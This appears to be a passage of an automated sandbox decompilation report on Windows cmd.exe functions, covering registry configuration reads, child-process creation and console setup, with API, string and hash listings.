                                                      							if(_v4108 != 4) {
                                                      								if(_v4108 != 1) {
                                                      									goto L7;
                                                      								}
                                                      								_t148 =  &_v4104;
                                                      								__imp___wtol(_t148);
                                                      								asm("sbb al, al");
                                                      								_t151 =  ~(_t148 - 1) + 1;
                                                      								L51:
                                                      								 *0x4a7706b0 = _t151;
                                                      								goto L7;
                                                      							}
                                                      							_t151 = _t113 & 0xffffff00 | _v4104 != 0x00000000;
                                                      							goto L51;
                                                      						}
                                                      						L7:
                                                      						_v4112 = _t161;
                                                      						_t117 = RegQueryValueExW(_v4116, L"EnableExtensions", _t176,  &_v4108,  &_v4104,  &_v4112);
                                                      						if(_t117 != 0) {
                                                      							L11:
                                                      							_v4112 = _t161;
                                                      							_t121 = RegQueryValueExW(_v4116, L"DelayedExpansion", _t176,  &_v4108,  &_v4104,  &_v4112);
                                                      							if(_t121 == 0) {
                                                      								if(_v4108 != 4) {
                                                      									if(_v4108 != 1) {
                                                      										goto L12;
                                                      									}
                                                      									_t140 =  &_v4104;
                                                      									__imp___wtol(_t140);
                                                      									asm("sbb al, al");
                                                      									_t143 =  ~(_t140 - 1) + 1;
                                                      									L57:
                                                      									 *0x4a754082 = _t143;
                                                      									goto L12;
                                                      								}
                                                      								_t143 = _t121 & 0xffffff00 | _v4104 != _t176;
                                                      								goto L57;
                                                      							}
                                                      							L12:
                                                      							_v4112 = _t161;
                                                      							if(RegQueryValueExW(_v4116, L"DefaultColor", _t176,  &_v4108,  &_v4104,  &_v4112) != 0) {
                                                      								L16:
                                                      								_v4112 = _t161;
                                                      								if(RegQueryValueExW(_v4116, L"CompletionChar", _t176,  &_v4108,  &_v4104,  &_v4112) != 0) {
                                                      									L24:
                                                      									_v4112 = _t161;
                                                      									if(RegQueryValueExW(_v4116, L"PathCompletionChar", _t176,  &_v4108,  &_v4104,  &_v4112) != 0) {
                                                      										_t101 =  *0x4a7540a4; // 0x20
                                                      										L32:
                                                      										_t162 =  *0x4a7540a0; // 0x20
                                                      										_t174 = 0x20;
                                                      										if(_t162 != _t174) {
                                                      											_t181 = _t101 - _t174;
                                                      											L34:
                                                      											if(_t181 == 0 && _t162 < _t174) {
                                                      												 *0x4a7540a4 = _t162;
                                                      											}
                                                      											L36:
                                                      											_v4112 = _t161;
                                                      											if(RegQueryValueExW(_v4116, L"AutoRun", _t176,  &_v4108,  &_v4104,  &_v4112) == 0) {
                                                      												if(_v4108 == 2) {
                                                      													_t155 = _v4112 >> 1;
                                                      													_t177 = _t178 + _t155 * 2 - 0x1000;
                                                      													if(ExpandEnvironmentStringsW( &_v4104, _t178 + _t155 * 2 - 0x1000, 0x7fe - _t155) == 0) {
                                                      														_v4104 = 0;
                                                      													} else {
                                                      														E4A73185A( &_v4104, 0x800, _t177);
                                                      													}
                                                      													_t176 = 0;
                                                      												}
                                                      												if(_v4104 != _t176) {
                                                      													 *_v4120 = E4A7319D6( &_v4104);
                                                      												}
                                                      											}
                                                      											RegCloseKey(_v4116);
                                                      											goto L38;
                                                      										}
                                                      										if(_t101 < _t174) {
                                                      											 *0x4a7540a0 = _t101;
                                                      											goto L36;
                                                      										}
                                                      										goto L34;
                                                      									}
                                                      									if(_v4108 != 4) {
                                                      										if(_v4108 != 1) {
                                                      											_t101 =  *0x4a7540a4; // 0x20
                                                      											L28:
                                                      											if(_t101 == _t176 || _t101 == 0xd || _t101 > 0x20) {
                                                      												_t101 = 0x20;
                                                      												 *0x4a7540a4 = _t101;
                                                      											}
                                                      											goto L32;
                                                      										}
                                                      										_t101 = wcstol( &_v4104, _t176, _t176);
                                                      										_t179 = _t179 + 0xc;
                                                      										L27:
                                                      										 *0x4a7540a4 = _t101;
                                                      										goto L28;
                                                      									}
                                                      									_t101 = _v4104;
                                                      									goto L27;
                                                      								}
                                                      								if(_v4108 != 4) {
                                                      									if(_v4108 != 1) {
                                                      										_t135 =  *0x4a7540a0; // 0x20
                                                      										L20:
                                                      										if(_t135 == _t176 || _t135 == 0xd || _t135 > 0x20) {
                                                      											_t136 = 0x20;
                                                      											 *0x4a7540a0 = _t136;
                                                      										}
                                                      										goto L24;
                                                      									}
                                                      									_t135 = wcstol( &_v4104, _t176, _t176);
                                                      									_t179 = _t179 + 0xc;
                                                      									L19:
                                                      									 *0x4a7540a0 = _t135;
                                                      									goto L20;
                                                      								}
                                                      								_t135 = _v4104;
                                                      								goto L19;
                                                      							}
                                                      							if(_v4108 != 4) {
                                                      								if(_v4108 == 1) {
                                                      									_t139 = wcstol( &_v4104, _t176, _t176);
                                                      									_t179 = _t179 + 0xc;
                                                      									L15:
                                                      									 *0x4a75408a = _t139;
                                                      									goto L16;
                                                      								}
                                                      								goto L16;
                                                      							}
                                                      							_t139 = _v4104;
                                                      							goto L15;
                                                      						}
                                                      						if(_v4108 != 4) {
                                                      							if(_v4108 == 1) {
                                                      								_t144 =  &_v4104;
                                                      								__imp___wtol(_t144);
                                                      								asm("sbb al, al");
                                                      								_t147 =  ~(_t144 - 1) + 1;
                                                      								L10:
                                                      								 *0x4a754081 = _t147;
                                                      								goto L11;
                                                      							}
                                                      							goto L11;
                                                      						}
                                                      						_t147 = _t117 & 0xffffff00 | _v4104 != _t176;
                                                      						goto L10;
                                                      						L38:
                                                      						_v4120 = _v4120 + 4;
                                                      						_t62 =  &_v4124;
                                                      						 *_t62 = _v4124 - 1;
                                                      						if( *_t62 != 0) {
                                                      							_t165 = _v4128;
                                                      							continue;
                                                      						}
                                                      						__imp__time();
                                                      						srand(_t101);
                                                      						_t175 = _t176;
                                                      						_pop(_t176);
                                                      						_pop(_t161);
                                                      						goto L40;
                                                      					}
                                                      				}
                                                      			}

                                                      APIs
                                                      • RegOpenKeyExW.KERNEL32 ref: 4A737EA4
                                                      • RegQueryValueExW.KERNEL32(?,DisableUNCCheck,00000000,?,?,?), ref: 4A737EDF
                                                      • RegQueryValueExW.KERNEL32(?,EnableExtensions,00000000,00000001,?,?), ref: 4A737F10
                                                      • RegQueryValueExW.KERNEL32(?,DelayedExpansion,00000000,00000001,?,?), ref: 4A737F58
                                                      • RegQueryValueExW.KERNEL32(?,DefaultColor,00000000,00000001,?,?), ref: 4A737F89
                                                      • RegQueryValueExW.KERNEL32(?,CompletionChar,00000000,00000001,?,?), ref: 4A737FD0
                                                      • RegQueryValueExW.KERNEL32(?,PathCompletionChar,00000000,00000001,?,?), ref: 4A738031
                                                      • RegQueryValueExW.KERNEL32(?,AutoRun,00000000,00000004,?,?), ref: 4A7380BD
                                                      • RegCloseKey.KERNEL32(?), ref: 4A7380CD
                                                      • time.MSVCRT ref: 4A7380E7
                                                      • srand.MSVCRT ref: 4A7380EE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: QueryValue$CloseOpensrandtime
                                                      • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                      • API String ID: 145004033-3846321370
                                                      • Opcode ID: e4495c9902b3c768526e9ef5e06ba46a3af5e37adbd3ec6a2ebe81371c6f9446
                                                      • Instruction ID: 298064643be4c82370698c6c87317dd1b2c02bced657fb5ac2c26d629cbe7753
                                                      • Opcode Fuzzy Hash: e4495c9902b3c768526e9ef5e06ba46a3af5e37adbd3ec6a2ebe81371c6f9446
                                                      • Instruction Fuzzy Hash: 47C182B68052A8EADB71DB50CD44ADA7BBCEF09302F0180E6E689D2501D7749BCCCF65
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 69%
                                                      			E4A733E02(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                      				void* _t97;
                                                      				void* _t103;
                                                      				intOrPtr _t111;
                                                      				intOrPtr _t116;
                                                      				WCHAR* _t118;
                                                      				int _t119;
                                                      				long _t122;
                                                      				signed int _t126;
                                                      				int _t130;
                                                      				void* _t139;
                                                      				void* _t141;
                                                      				void* _t147;
                                                      				void* _t153;
                                                      				void* _t154;
                                                      				void* _t160;
                                                      				void* _t163;
                                                      				void* _t164;
                                                      				void* _t165;
                                                      				int _t170;
                                                      				int _t171;
                                                      				int _t175;
                                                      				WCHAR* _t176;
                                                      				void* _t178;
                                                      				void* _t179;
                                                      				void* _t180;
                                                      				void* _t189;
                                                      				void* _t190;
                                                      				void* _t198;
                                                      				int _t199;
                                                      
                                                      				_t163 = __ecx;
                                                      				E4A7313E1(__ebx, __edi, __esi);
                                                      				 *((intOrPtr*)(_t178 - 0x7c)) =  *((intOrPtr*)(_t178 + 8));
                                                      				 *(_t178 - 0x74) =  *(_t178 + 0x14);
                                                      				_t174 =  *(_t178 + 0x18);
                                                      				 *(_t178 - 0x68) =  *(_t178 + 0x18);
                                                      				 *((intOrPtr*)(_t178 - 0x84)) = 0;
                                                      				 *((intOrPtr*)(_t178 - 0x9c)) = 0;
                                                      				 *((intOrPtr*)(_t178 - 0x6c)) = 0;
                                                      				 *((intOrPtr*)(_t178 - 0x78)) = 0x20;
                                                      				_t170 = 1;
                                                      				_t97 = _t178 - 0x140;
                                                      				__imp__InitializeProcThreadAttributeList(_t97, 1, 0, _t178 - 0x78, 0x4a734098, 0x174);
                                                      				if(_t97 == 0) {
                                                      					 *0x4a754128 = GetLastError();
                                                      					E4A74065B(_t174, _t174);
                                                      					L34:
                                                      					L23:
                                                      					return E4A7313CA(0, _t170, _t174);
                                                      				}
                                                      				 *((intOrPtr*)(_t178 - 0x80)) = 1;
                                                      				_t103 = _t178 - 0x140;
                                                      				__imp__UpdateProcThreadAttribute(_t103, 0, 0x60001, _t178 - 0x80, 4, 0, 0);
                                                      				if(_t103 == 0) {
                                                      					 *0x4a754128 = GetLastError();
                                                      					E4A74065B(_t174, _t174);
                                                      					__imp__DeleteProcThreadAttributeList(_t178 - 0x140);
                                                      					goto L34;
                                                      				} else {
                                                      					_t175 = 0x48;
                                                      					memset(_t178 - 0xe4, 0, _t175);
                                                      					_t180 = _t179 + 0xc;
                                                      					 *((intOrPtr*)(_t178 - 0xa0)) = _t178 - 0x140;
                                                      					 *(_t178 - 0xe4) = _t175;
                                                      					 *((intOrPtr*)(_t178 - 0xd8)) =  *((intOrPtr*)(_t178 + 0x1c));
                                                      					 *((intOrPtr*)(_t178 - 0xd4)) = 0;
                                                      					 *((intOrPtr*)(_t178 - 0xd0)) = 1;
                                                      					_t111 = 0x64;
                                                      					 *((intOrPtr*)(_t178 - 0xcc)) = _t111;
                                                      					 *((intOrPtr*)(_t178 - 0xc8)) = _t111;
                                                      					 *((intOrPtr*)(_t178 - 0xb8)) = 0;
                                                      					 *(_t178 - 0xb4) = 1;
                                                      					 *(_t178 - 0x184) = 0x44;
                                                      					GetStartupInfoW(_t178 - 0x184);
                                                      					 *((intOrPtr*)(_t178 - 0xdc)) =  *((intOrPtr*)(_t178 - 0x17c));
                                                      					 *((intOrPtr*)(_t178 - 4)) = 0;
                                                      					_t174 = L"COPYCMD";
                                                      					if(E4A73321B(_t163, L"COPYCMD") == 0) {
                                                      						_t115 = E4A733AFC;
                                                      					}
                                                      					_t116 = E4A7319D6(_t115);
                                                      					 *((intOrPtr*)(_t178 - 0x6c)) = _t116;
                                                      					if(_t116 == 0) {
                                                      						L36:
                                                      						_push(0xfffffffe);
                                                      						_push(_t178 - 0x10);
                                                      						_push(0x4a7540ac);
                                                      						L4A75219B();
                                                      						goto L34;
                                                      					}
                                                      					_t189 =  *0x4a7540e0; // 0x0
                                                      					if(_t189 != 0) {
                                                      						L7:
                                                      						_t118 = E4A732148( *(_t178 - 0x68), 0x5c);
                                                      						if(_t118 != 0 && lstrcmpW(_t118, L"\\XCOPY.EXE") == 0) {
                                                      							E4A74CD7C(_t163, _t174, E4A739A54);
                                                      						}
                                                      						_t119 =  *0x4a7540b4; // 0x0
                                                      						if(_t119 == 0 ||  *((intOrPtr*)(_t119 + 0x30)) == 0) {
                                                      							L11:
                                                      							_t176 = 0x4a755260;
                                                      							_t119 = CreateProcessW( *(_t178 - 0x68),  *(_t178 - 0x74), 0, 0, _t170, 0x80000, 0, 0x4a755260, _t178 - 0xe4, _t178 - 0x98);
                                                      							goto L12;
                                                      						} else {
                                                      							_push(_t178 - 0x98);
                                                      							_push(_t178 - 0xe4);
                                                      							_t176 = 0x4a755260;
                                                      							_push(0x4a755260);
                                                      							_push(0);
                                                      							_push(0x80000);
                                                      							_push(_t170);
                                                      							_push(0);
                                                      							_push(0);
                                                      							_push( *(_t178 - 0x74));
                                                      							_push( *(_t178 - 0x68));
                                                      							_push( *((intOrPtr*)(_t119 + 0x30)));
                                                      							"^$uJh$uJr$uJ|$uJ"();
                                                      							L12:
                                                      							 *(_t178 - 0x64) = _t119;
                                                      							if(_t119 == 0) {
                                                      								_t122 = GetLastError();
                                                      								 *(_t178 - 0x70) = _t122;
                                                      								 *0x4a754128 = _t122;
                                                      							} else {
                                                      								 *(_t178 - 0x60) =  *(_t178 - 0x98);
                                                      								CloseHandle( *(_t178 - 0x94));
                                                      							}
                                                      							E4A731730(L"COPYCMD",  *((intOrPtr*)(_t178 - 0x6c)));
                                                      							if( *(_t178 - 0x64) == 0) {
                                                      								__eflags =  *0x4a754081; // 0x0
                                                      								if(__eflags == 0) {
                                                      									L42:
                                                      									__eflags =  *0x4a754128 - 0x2e4;
                                                      									if( *0x4a754128 != 0x2e4) {
                                                      										L51:
                                                      										__eflags =  *(_t178 - 0x64);
                                                      										if( *(_t178 - 0x64) != 0) {
                                                      											goto L15;
                                                      										}
                                                      										_t174 = E4A731896(0x208);
                                                      										__eflags = _t174;
                                                      										if(_t174 != 0) {
                                                      											E4A73185A(_t174, 0x104,  *(_t178 - 0x68));
                                                      											E4A74065B(_t174, _t174);
                                                      											E4A73142E(_t174);
                                                      										}
                                                      										goto L36;
                                                      									}
                                                      									L43:
                                                      									_t171 = 0x3c;
                                                      									_t147 = memset(_t178 - 0x120, 0, _t171);
                                                      									_t180 = _t180 + 0xc;
                                                      									 *(_t178 - 0x120) = _t171;
                                                      									 *((intOrPtr*)(_t178 - 0x11c)) = 0x8140;
                                                      									__imp__GetConsoleWindow();
                                                      									 *(_t178 - 0x118) = _t147;
                                                      									 *(_t178 - 0x110) =  *(_t178 - 0x68);
                                                      									 *((intOrPtr*)(_t178 - 0x10c)) =  *((intOrPtr*)( *((intOrPtr*)(_t178 - 0x7c)) + 0x3c));
                                                      									 *(_t178 - 0x108) = _t176;
                                                      									 *(_t178 - 0x104) =  *(_t178 - 0xb4) & 0x0000ffff;
                                                      									 *((intOrPtr*)(_t178 - 4)) = 1;
                                                      									_t153 =  *0x4a75403c(_t178 - 0x120);
                                                      									 *(_t178 - 0x64) = _t153;
                                                      									__eflags = _t153;
                                                      									if(_t153 == 0) {
                                                      										_t154 =  *(_t178 - 0x100);
                                                      										__eflags = _t154;
                                                      										if(_t154 != 0) {
                                                      											__eflags = _t154 - 0x20;
                                                      											if(_t154 != 0x20) {
                                                      												 *0x4a754128 = _t154;
                                                      											} else {
                                                      												 *0x4a754128 = 2;
                                                      											}
                                                      										} else {
                                                      											 *0x4a754128 = 8;
                                                      										}
                                                      									} else {
                                                      										 *(_t178 - 0x60) =  *(_t178 - 0xe8);
                                                      									}
                                                      									 *((intOrPtr*)(_t178 - 4)) = 0;
                                                      									_t170 = 1;
                                                      									__eflags = 1;
                                                      									goto L51;
                                                      								}
                                                      								__eflags =  *0x4a754128 - 0xc1;
                                                      								if( *0x4a754128 == 0xc1) {
                                                      									goto L43;
                                                      								}
                                                      								goto L42;
                                                      							} else {
                                                      								L15:
                                                      								_t164 =  *(_t178 - 0x60);
                                                      								_t174 = _t164 & _t170;
                                                      								_t126 = _t164 >> 0x00000001 & _t170;
                                                      								if(_t164 == 0) {
                                                      									L32:
                                                      									 *(_t178 + 0xc) = 4;
                                                      									L18:
                                                      									 *(_t178 - 0x70) = 0;
                                                      									 *0x4a7541bc = _t170;
                                                      									if( *(_t178 + 0xc) == 0) {
                                                      										_t130 = E4A733BE0(_t164, _t164);
                                                      										 *0x4a754188 = _t130;
                                                      										 *(_t178 - 0x60) = 0;
                                                      										_t170 = _t130;
                                                      										 *(_t178 - 0x70) = _t170;
                                                      										E4A73179D(_t178 - 0x5c, 0x14, L"%08X", _t170);
                                                      										E4A731730(L"=ExitCode", _t178 - 0x5c);
                                                      										_t53 = _t170 - 0x20; // -32
                                                      										if(_t53 <= 0x5e) {
                                                      											E4A73179D(_t178 - 0x34, 0xc, L"%01C", _t170);
                                                      											_push(_t178 - 0x34);
                                                      										} else {
                                                      											_push(E4A731794);
                                                      										}
                                                      										_push(L"=ExitCodeAscii");
                                                      										_t139 = E4A731730();
                                                      										if(_t174 != 0) {
                                                      											E4A74CF50(_t139);
                                                      										}
                                                      									} else {
                                                      										__eflags =  *(_t178 + 0xc) - 4;
                                                      										if( *(_t178 + 0xc) == 4) {
                                                      											__eflags = _t164;
                                                      											if(_t164 != 0) {
                                                      												CloseHandle(_t164);
                                                      												 *(_t178 - 0x60) = 0;
                                                      											}
                                                      										} else {
                                                      											__eflags =  *(_t178 + 0xc) - 2;
                                                      											if( *(_t178 + 0xc) == 2) {
                                                      												 *0x4a754180 = _t164;
                                                      											}
                                                      										}
                                                      									}
                                                      									 *((intOrPtr*)(_t178 - 4)) = 0xfffffffe;
                                                      									E4A7340C5();
                                                      									goto L23;
                                                      								}
                                                      								_t198 =  *0x4a754081; // 0x0
                                                      								if(_t198 == 0) {
                                                      									goto L18;
                                                      								}
                                                      								_t199 =  *0x4a7540b4; // 0x0
                                                      								if(_t199 == 0) {
                                                      									__eflags =  *0x4a7540e0; // 0x0
                                                      									if(__eflags != 0) {
                                                      										goto L18;
                                                      									}
                                                      									__eflags =  *0x4a7540e4; // 0x0
                                                      									if(__eflags != 0) {
                                                      										goto L18;
                                                      									}
                                                      									__eflags =  *(_t178 + 0xc);
                                                      									if( *(_t178 + 0xc) == 0) {
                                                      										__eflags = _t126;
                                                      										if(_t126 != 0) {
                                                      											goto L32;
                                                      										}
                                                      										_t141 = E4A74D7C9(_t164);
                                                      										_t165 = 2;
                                                      										__eflags = _t165 - _t141;
                                                      										_t164 =  *(_t178 - 0x60);
                                                      										if(_t165 == _t141) {
                                                      											goto L32;
                                                      										}
                                                      									}
                                                      								}
                                                      								goto L18;
                                                      							}
                                                      						}
                                                      					}
                                                      					_t190 =  *0x4a7540e4; // 0x0
                                                      					if(_t190 == 0) {
                                                      						_t160 =  *0x4a7540b4; // 0x0
                                                      						__eflags = _t160;
                                                      						if(_t160 != 0) {
                                                      							goto L7;
                                                      						}
                                                      						goto L11;
                                                      					}
                                                      					goto L7;
                                                      				}
                                                      			}
































                                                      0x00000000
                                                      0x4a7458d5
                                                      0x4a7458b2
                                                      0x00000000
                                                      0x4a733fed
                                                      0x4a733fc4
                                                      0x4a733f60
                                                      0x4a733f2b
                                                      0x4a733f31
                                                      0x4a73ce9d
                                                      0x4a73cea2
                                                      0x4a73cea4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x4a73ceaa
                                                      0x00000000
                                                      0x4a733f31

                                                      APIs
                                                      • InitializeProcThreadAttributeList.KERNEL32(?,00000001,00000000,00000020), ref: 4A733E4B
                                                      • UpdateProcThreadAttribute.KERNEL32(?,00000000,00060001,?,00000004,00000000,00000000), ref: 4A733E71
                                                      • memset.MSVCRT ref: 4A733E8B
                                                      • GetStartupInfoW.KERNEL32(00000044), ref: 4A733EE9
                                                        • Part of subcall function 4A73321B: _wcsnicmp.MSVCRT ref: 4A73329D
                                                      • lstrcmpW.KERNEL32(00000000,\XCOPY.EXE,?,0000005C,00000000,COPYCMD), ref: 4A733F4B
                                                      • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,00080000,00000000,4A755260,?,?), ref: 4A733F8E
                                                      • CloseHandle.KERNEL32(?), ref: 4A733FAE
                                                      • GetLastError.KERNEL32 ref: 4A7456DE
                                                      • GetLastError.KERNEL32 ref: 4A7456F6
                                                      • DeleteProcThreadAttributeList.KERNEL32(?,?), ref: 4A74570E
                                                      • _local_unwind4.MSVCRT ref: 4A745721
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: AttributeProcThread$ErrorLastList$CloseCreateDeleteHandleInfoInitializeProcessStartupUpdate_local_unwind4_wcsnicmplstrcmpmemset
                                                      • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$^$uJh$uJr$uJ|$uJ
                                                      • API String ID: 2658032697-2131258224
                                                      • Opcode ID: 1724bb72e86c30a3366867f0a31e0cfc26a7b6d555973c5225c74375a124edd2
                                                      • Instruction ID: 16fa2199b269cc72680111e187a39b1826d4b1a2f5d882fd78d3a87fcf952943
                                                      • Opcode Fuzzy Hash: 1724bb72e86c30a3366867f0a31e0cfc26a7b6d555973c5225c74375a124edd2
                                                      • Instruction Fuzzy Hash: 10C16EB1D49619EBDB70DF91C885ADDBFB9BB09311F1241AAE609EB502D7304E88CF11
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 60%
                                                      			E4A7384E3(intOrPtr* _a4, intOrPtr _a8) {
                                                      				signed int _v8;
                                                      				char _v72;
                                                      				intOrPtr* _v76;
                                                      				struct _CONSOLE_SCREEN_BUFFER_INFO _v100;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t19;
                                                      				long _t21;
                                                      				WCHAR* _t29;
                                                      				struct HINSTANCE__* _t44;
                                                      				intOrPtr* _t48;
                                                      				intOrPtr* _t60;
                                                      				int _t65;
                                                      				int _t70;
                                                      				void* _t72;
                                                      				void* _t73;
                                                      				short* _t77;
                                                      				void* _t79;
                                                      				WCHAR** _t80;
                                                      				short _t84;
                                                      				void* _t85;
                                                      				intOrPtr _t88;
                                                      				signed int _t91;
                                                      				void* _t92;
                                                      				void* _t102;
                                                      
                                                      				_t19 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t19 ^ _t91;
                                                      				_t87 = _a4;
                                                      				_v76 = _a4;
                                                      				if(_a8 < 3) {
                                                      					_t21 = 0;
                                                      					goto L16;
                                                      				} else {
                                                      					 *0x4a7541a4 = 0x4a754220;
                                                      					InitializeCriticalSection(0x4a754220);
                                                      					E4A731E6C(0x4a754220);
                                                      					SetConsoleCtrlHandler(E4A74E72A, 1);
                                                      					E4A731605();
                                                      					E4A737AF3();
                                                      					E4A737E13(_t87, _a8);
                                                      					_t88 = GetCommandLineW;
                                                      					_t29 = GetCommandLineW();
                                                      					_t6 =  &(_t29[1]); // 0x2
                                                      					_t77 = _t6;
                                                      					do {
                                                      						_t84 =  *_t29;
                                                      						_t29 =  &(_t29[1]);
                                                      					} while (_t84 != 0);
                                                      					_push(_t85);
                                                      					_t86 = 0x2000;
                                                      					if((_t29 - _t77 >> 1) + 1 > 0x2000) {
                                                      						_push(0);
                                                      						E4A736D44(_t77);
                                                      						_t79 = 0x400023df;
                                                      						_push(1);
                                                      						L29:
                                                      						_t35 = E4A7372E9(_t79, _t86, _t88, __eflags);
                                                      						L30:
                                                      						_t80 =  *0x4a7541a8; // 0x0
                                                      						 *_t80 = _t35;
                                                      						L9:
                                                      						_t102 =  *0x4a7540e4 - _t86; // 0x0
                                                      						if(_t102 == 0) {
                                                      							_t35 = E4A734490(_t35, 1);
                                                      							__eflags = _t35;
                                                      							if(_t35 == 0) {
                                                      								goto L10;
                                                      							}
                                                      							__eflags =  *0x4a75408a - _t86; // 0x0
                                                      							if(__eflags != 0) {
                                                      								L26:
                                                      								_push( *0x4a75408a & 0x0000ffff);
                                                      								_t35 = E4A740AF9();
                                                      								goto L10;
                                                      							}
                                                      							_t35 = GetConsoleScreenBufferInfo(GetStdHandle(0xfffffff5),  &_v100);
                                                      							__eflags = _t35;
                                                      							if(_t35 != 0) {
                                                      								_t35 = _v100.wAttributes;
                                                      								 *0x4a75408a = _v100.wAttributes;
                                                      							}
                                                      							__eflags =  *0x4a75408a - _t86; // 0x0
                                                      							if(__eflags == 0) {
                                                      								goto L10;
                                                      							} else {
                                                      								goto L26;
                                                      							}
                                                      						}
                                                      						L10:
                                                      						if( *((intOrPtr*)(_t88 + 8)) == _t86) {
                                                      							_t73 = E4A74E3E9(_t35, L"%WINDOWS_COPYRIGHT%", _t86);
                                                      							E4A73D3B3( &_v72, 0x20);
                                                      							E4A7399E1(_t80, 0x2350, 1,  &_v72);
                                                      							_push(0x4a7545a8);
                                                      							E4A7358F3();
                                                      							__eflags = _t73 - _t86;
                                                      							if(_t73 == _t86) {
                                                      								_push(_t86);
                                                      								E4A736D44(_t80);
                                                      								_t80 = 8;
                                                      							} else {
                                                      								E4A7358F3(E4A732CB4, _t73);
                                                      								_push(0x4a7545a8);
                                                      								E4A7358F3();
                                                      							}
                                                      							GlobalFree(_t73);
                                                      							__eflags =  *0x4a770670;
                                                      							if( *0x4a770670 == 0) {
                                                      								__eflags =  *0x4a754081;
                                                      								if( *0x4a754081 != 0) {
                                                      									_push(_t86);
                                                      									_push(0x4000239f);
                                                      									E4A7399E1(_t80);
                                                      								}
                                                      							}
                                                      						}
                                                      						_t44 = GetModuleHandleW(L"KERNEL32.DLL");
                                                      						_t87 = GetProcAddress;
                                                      						 *0x4a754094 = _t44;
                                                      						 *0x4a7541ec = GetProcAddress(_t44, "CopyFileExW");
                                                      						 *0x4a7541e4 = GetProcAddress( *0x4a754094, "IsDebuggerPresent");
                                                      						 *0x4a7541f4 = GetProcAddress( *0x4a754094, "SetConsoleInputExeNameW");
                                                      						_t48 = _v76;
                                                      						_pop(_t72);
                                                      						if( *_t48 != _t86 ||  *((intOrPtr*)(_t48 + 4)) != _t86 ||  *((intOrPtr*)(_t48 + 8)) != _t86) {
                                                      							_t21 = 1;
                                                      						} else {
                                                      							_t21 = 0;
                                                      						}
                                                      						_pop(_t85);
                                                      						L16:
                                                      						return E4A7313A9(_t21, _t72, _v8 ^ _t91, _t84, _t85, _t87);
                                                      					}
                                                      					_push(_t72);
                                                      					E4A73185A(0x4a768640, 0x2000, GetCommandLineW());
                                                      					_t86 = 0x4a755260;
                                                      					E4A732C56(0x104, _t84, 0x4a755260, 0x4a755260, 0x104, 0);
                                                      					E4A7386C9(0x104, 0x4a755260, 0x4a768640);
                                                      					_t60 = 0x4a768640;
                                                      					_t7 = _t60 + 2; // 0x4a768642
                                                      					_t80 = _t7;
                                                      					do {
                                                      						_t84 =  *_t60;
                                                      						_t60 = _t60 + 2;
                                                      					} while (_t84 != 0);
                                                      					_t88 = _v76;
                                                      					E4A738B31(0x104, 0x4a755260, _t88, _a8, 0x4a768640, _t60 - _t80 >> 1);
                                                      					if( *0x4a755260 == 0x5c) {
                                                      						__eflags =  *0x4a755262 - 0x5c;
                                                      						if( *0x4a755262 != 0x5c) {
                                                      							goto L7;
                                                      						}
                                                      						__eflags =  *0x4a7706b0;
                                                      						if( *0x4a7706b0 != 0) {
                                                      							goto L7;
                                                      						}
                                                      						E4A736D44(_t80, 0x400023c8, 1, 0x4a755260);
                                                      						_t92 = _t92 + 0xc;
                                                      						_t70 = GetWindowsDirectoryW(0x4a755260, 0x104);
                                                      						_push(1);
                                                      						__eflags = _t70;
                                                      						if(__eflags == 0) {
                                                      							goto L29;
                                                      						}
                                                      						_push(0x4a755260);
                                                      						E4A736C78();
                                                      					}
                                                      					L7:
                                                      					_t65 = GetConsoleOutputCP();
                                                      					 *0x4a7541b8 = _t65;
                                                      					GetCPInfo(_t65, 0x4a754260);
                                                      					E4A7388D9();
                                                      					_t86 = 0;
                                                      					_t35 = HeapAlloc(GetProcessHeap(), 0, 0x20c);
                                                      					 *0x4a7541a8 = _t35;
                                                      					if(_t35 == 0) {
                                                      						goto L9;
                                                      					}
                                                      					_t35 = GetConsoleTitleW(_t35, 0x104);
                                                      					if(_t35 == 0) {
                                                      						goto L30;
                                                      					}
                                                      					goto L9;
                                                      				}
                                                      			}





























                                                      0x4a7384eb
                                                      0x4a7384f2
                                                      0x4a7384fa
                                                      0x4a7384fd
                                                      0x4a738500
                                                      0x4a7469ff
                                                      0x00000000
                                                      0x4a738506
                                                      0x4a73850c
                                                      0x4a738511
                                                      0x4a738517
                                                      0x4a738523
                                                      0x4a738529
                                                      0x4a73852e
                                                      0x4a738537
                                                      0x4a73853c
                                                      0x4a738542
                                                      0x4a738544
                                                      0x4a738544
                                                      0x4a738547
                                                      0x4a738547
                                                      0x4a73854b
                                                      0x4a73854c
                                                      0x4a738555
                                                      0x4a738557
                                                      0x4a73855e
                                                      0x4a746a06
                                                      0x4a746a0d
                                                      0x4a746a13
                                                      0x4a746a14
                                                      0x4a746a16
                                                      0x4a746a16
                                                      0x4a746a1b
                                                      0x4a746a1b
                                                      0x4a746a21
                                                      0x4a738605
                                                      0x4a738605
                                                      0x4a73860b
                                                      0x4a740944
                                                      0x4a740949
                                                      0x4a74094b
                                                      0x00000000
                                                      0x00000000
                                                      0x4a740951
                                                      0x4a740958
                                                      0x4a740988
                                                      0x4a74098f
                                                      0x4a740990
                                                      0x00000000
                                                      0x4a740990
                                                      0x4a740967
                                                      0x4a74096d
                                                      0x4a74096f
                                                      0x4a740971
                                                      0x4a740975
                                                      0x4a740975
                                                      0x4a74097b
                                                      0x4a740982
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x4a740982
                                                      0x4a738611
